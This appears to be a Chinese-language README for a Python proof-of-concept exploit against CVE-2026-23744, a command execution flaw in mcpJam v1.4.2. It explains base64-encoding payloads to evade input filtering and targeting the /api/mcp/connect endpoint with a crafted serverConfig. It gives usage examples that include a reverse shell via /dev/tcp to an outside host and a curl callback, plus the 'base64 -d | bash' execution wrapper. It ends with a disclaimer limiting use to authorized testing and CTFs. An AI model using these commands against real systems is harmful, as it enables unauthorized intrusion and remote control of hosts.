一个针对 CVE-2026-23744 的 Python 3 概念验证(Proof-of-Concept)漏洞利用程序,该漏洞是影响 mcpJam v1.4.2 的任意命令执行漏洞。
该工具通过在传输前将命令透明地 Base64 编码来自动化载荷传递,有助于绕过严格的输入验证和字符过滤机制。载荷在目标系统上通过 /bin/bash 包装器进行解码并执行。
命令在传输前会被自动编码,在针对强制实施严格输入验证或字符限制的应用程序时,可提高可靠性。
支持任意命令执行,包括:
sh、bash、nc 等)显示:
这简化了故障排除和漏洞利用验证。
抑制证书验证警告,允许与使用自签名或不受信任 SSL 证书的目标进行交互。
安装所需依赖:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
该漏洞利用程序通过构造恶意的 serverConfig 对象来针对 /api/mcp/connect 端点。
该载荷并非直接传输,而是先转换为 Base64 编码的字符串,再通过 Bash 执行:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
这种方法有助于规避应用层过滤,同时确保载荷完全在目标主机上解码并执行。
serverConfig 请求中。base64 -d 解码载荷。/bin/bash。[!WARNING] 本项目仅供教育目的、经授权的安全评估以及夺旗赛(CTF)环境使用。
未经明确许可对系统进行未授权使用是非法且不道德的。作者不对因使用本软件而导致的任何滥用、损害或法律后果承担责任。